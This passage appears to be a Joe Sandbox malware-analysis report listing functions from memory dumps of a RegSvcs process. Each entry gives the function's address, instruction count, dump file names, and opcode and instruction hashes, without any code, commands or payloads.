Instruction Fuzzy Hash: 4421E7B1E00259AFCB60DFAAD9819AEFBF9FF98700F10012EE405A7354DB749941CB54

Function 015E0BBE Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a72a60a409ae238f2d3a07ec7f7fbcf6f93e00b7d3a0fd5213e0fd65825419b
Instruction ID: fb7f33284b4ebc763a3fc3cc2ffea102ae320e9ece0320f55612c2fdb55175f9
Opcode Fuzzy Hash: 2a72a60a409ae238f2d3a07ec7f7fbcf6f93e00b7d3a0fd5213e0fd65825419b
Instruction Fuzzy Hash: FF1189317561429FDB2DCA18CC59B6AB3E9FF80B16F18812DF4068F292DB74E842C755

Function 01600124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46eb36b7a6c8140c37ab79ae24ad727a5b013edb67e3bfdf748b7c30626e4c0d
Instruction ID: e01d5dfc6c70b8e31d64fe499c05d962b97fc3bb5bb487e23215e28842019450
Opcode Fuzzy Hash: 46eb36b7a6c8140c37ab79ae24ad727a5b013edb67e3bfdf748b7c30626e4c0d
Instruction Fuzzy Hash: B911D073600605AFD7279F94CC40F9BBBB9EB80795F1044A9F6048B2C0D671ED44CB54

Function 015D8770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37f2382551fb4ee1f7254d8e01ff0fc82f94a09bf8b77d04b9572e5597a21b2
Instruction ID: 4de1c60ecc5156878f6fea035a963e0b69277e2086151e0c1fb6b29be1b165d8
Opcode Fuzzy Hash: f37f2382551fb4ee1f7254d8e01ff0fc82f94a09bf8b77d04b9572e5597a21b2
Instruction Fuzzy Hash: CE1194357016129BDB26CF4EC5C0A6ABBE9FF8A750B1A406DEE099F305D6B2D901C790

Function 0160AAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a1be8a3b3cecc6c09c2884dded5306318366361ede00ec49aaa0184f86d080
Instruction ID: 00f58a1733043d33658c69b35318a44525707b356f18e36d3421ee5ce1fbb01f
Opcode Fuzzy Hash: 24a1be8a3b3cecc6c09c2884dded5306318366361ede00ec49aaa0184f86d080
Instruction Fuzzy Hash: 74216872600B41DFD72A8F99C944A66BBE6FB94B90F14896DE54A8B750C770EC01CB80

Function 015D80E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b0868c21782666e8250f8c0131a2de7b36664b4638390e43e0527afc029b1b
Instruction ID: 17b004711c87fe20b4d11aeb108afa9d2870680b18c402c8edee0cb00a27345d
Opcode Fuzzy Hash: 02b0868c21782666e8250f8c0131a2de7b36664b4638390e43e0527afc029b1b
Instruction Fuzzy Hash: 47215B75A00206DFCB24CFACC591AAEBBF5FB88318F24416DD105AB351DB71AD0ACB90

Function 0160674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63d55a36184e978b852b588ef7cdbb80a548b9b0c0c67a72e7fcf16cf1f7dc5
Instruction ID: 6170cf3a1e28659964070b9c9242a707f6ddf7c53da3a85921be2f2ad02abe43
Opcode Fuzzy Hash: b63d55a36184e978b852b588ef7cdbb80a548b9b0c0c67a72e7fcf16cf1f7dc5
Instruction Fuzzy Hash: 72216D75510A01EFD7298F69CC41B77B7E8FF84650F04882DE59AC7290DB70E960CB60

Function 015CEA80 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79a2172fdce60e2d1a61e951968a3b78e9cd1c935f44e4d42ea7f0254f290a7
Instruction ID: 6c17cdecd5a015d5859b43d5d6efc0d60ec23bf9259415bfbe0f4646f6e38ea9
Opcode Fuzzy Hash: e79a2172fdce60e2d1a61e951968a3b78e9cd1c935f44e4d42ea7f0254f290a7
Instruction Fuzzy Hash: 57116DB1501B52AFD3619F26CD84A17BBF8FF54754B00892DE54A8B620D770E804CFA4

Function 015FE8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5f32925f38d2886268d53669dbc8f5dc1f7e29d94ece127c370bb0d83b6f14
Instruction ID: 8521eae2134d11ca69335d7a19ccb31ec6b7024a62add947724046f21a540208
Opcode Fuzzy Hash: fa5f32925f38d2886268d53669dbc8f5dc1f7e29d94ece127c370bb0d83b6f14
Instruction Fuzzy Hash: DA1148337001109BCB1ACB29CD85A7B7297EFD1670F25496CEA228F390EA308812C3A4

Function 015E2B79 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e531b1b116e796ede91b05f1854db9c15806d6ee9a8b6133ec4facf08ddfcfd2
Instruction ID: a2885bed61eccba4715c40f235002353a2589797110961621afc6a9fdc4763c6
Opcode Fuzzy Hash: e531b1b116e796ede91b05f1854db9c15806d6ee9a8b6133ec4facf08ddfcfd2
Instruction Fuzzy Hash: 8C11AF72E056589BDF26CF89D888BAEBBFCFF44750F084496E905AB240C374AD41CB90

Function 016066B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204f5b82a29ce69e31d6e15016e31c2238bb8d94fad93d7ba69ee5911d8956a9
Instruction ID: 59ec1015b23397d2ec1fba21f291103b8d6c991801f82739e0f33f2899d0a264
Opcode Fuzzy Hash: 204f5b82a29ce69e31d6e15016e31c2238bb8d94fad93d7ba69ee5911d8956a9
Instruction Fuzzy Hash: A011CE76A01216EFCB2ACF59CD84A6BBBF8AF84610F01407AD9059B350E770DD10CBA0

Function 015D0AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cb38f11a0ce4d193993f42e92a8429a61735cfa4d33da09d4f786176161830
Instruction ID: e1357bc9ddde5f1d13971e219a84b7efd8806c226a2109eed6389488b0910e5b
Opcode Fuzzy Hash: a0cb38f11a0ce4d193993f42e92a8429a61735cfa4d33da09d4f786176161830
Instruction Fuzzy Hash: 2621F4B5A00B059FD3A0CF29C440B56BBF4FB48B10F10492EE98ACBB40E371E814CB94

Function 0165E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: 481f388970a88ab2d46ad7aa3c97f2a9e966c120e9249b3d79c89dcad472836f
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: D3119132600601EFEF659F48CC40B56FBA6EB55754F06842DED0A9B250D732DE40D790

Function 015F27ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 380d02cb0e1a9f7c473e7357549d5a0e00acc3a74364fb5ef12b716dfa0696ff
Instruction ID: 50ea082306593b7ff40d538792b3464a03379fe28845e3cce8ff0cd34faa0773
Opcode Fuzzy Hash: 380d02cb0e1a9f7c473e7357549d5a0e00acc3a74364fb5ef12b716dfa0696ff
Instruction Fuzzy Hash: 7401C472605685ABE326A6AE9C58F276BDDFF80794F0500A9FA41CF291DA14DC00C261

Function 015D4690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84587dfa1c2908b7b047309d097bfc4f5a14df3834668acfdaa08139e7074e7a
Instruction ID: cf95d1bb58e4a4ba450a3c1a7ed5f3b1a8b72d450688c94c9a0ad51e04623f1b
Opcode Fuzzy Hash: 84587dfa1c2908b7b047309d097bfc4f5a14df3834668acfdaa08139e7074e7a
Instruction Fuzzy Hash: 15110E36241681AFDB35CF5EC880F2A7BA8FB86B64F024119F9058FA80C770E841CF60

Function 01606620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04080ca95f1f77c00b59e176809e7d9078e5eded50e518f0c1464a4d7f03551
Instruction ID: c41e3b032c2a60aa5b1ed6c3af48e606fc234075ab2bb2c655928c3b2b1967ee
Opcode Fuzzy Hash: e04080ca95f1f77c00b59e176809e7d9078e5eded50e518f0c1464a4d7f03551
Instruction Fuzzy Hash: C9118E72A10726ABDB26DF59CD80B5FFBB8FF84750F540459EA05AB340DB30AD118BA1

Function 015FE53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: ed637dcb939eb0301026d9dfb1b408577ee78c2c55d771df2e735aac625978db
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: 6911C671A016C69BE722971C8D48B2937D4FB81784F1A04E4DE418F792F728C842C252

Function 0165E75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: 4bc9335730336153d04e5da9f584f105c70b7a5577d4ac8a51f82cc6f4ab031f
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 8601D236B00506AFEF659F58CD00F7AFAA9FB81750F058028EE099B260E772DE41C790

Function 015CC301 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778c373ea81032540963c18d56f6d779ce83a666a1fd403f9c7d5110ae95739e
Instruction ID: a33c27c04bcff8b65f7dbcd9331ba253f9c87a203837ffea7ce2a1df62a190ed
Opcode Fuzzy Hash: 778c373ea81032540963c18d56f6d779ce83a666a1fd403f9c7d5110ae95739e
Instruction Fuzzy Hash: C2F024336006339FD7325ED99840F6BAA99AFD0FA1B15003DF20D9F604CAA08802A7D0

Function 015CA250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: 1ecbc56c6a96679d03cfe340998ed7be8fb9b90da38af7d2e7e0a5a351ad7869
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: 4501043240473A9FEB218F599840A367FE6FB55B64700892DF8958F281E331D400CBA0

Function 0164E1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
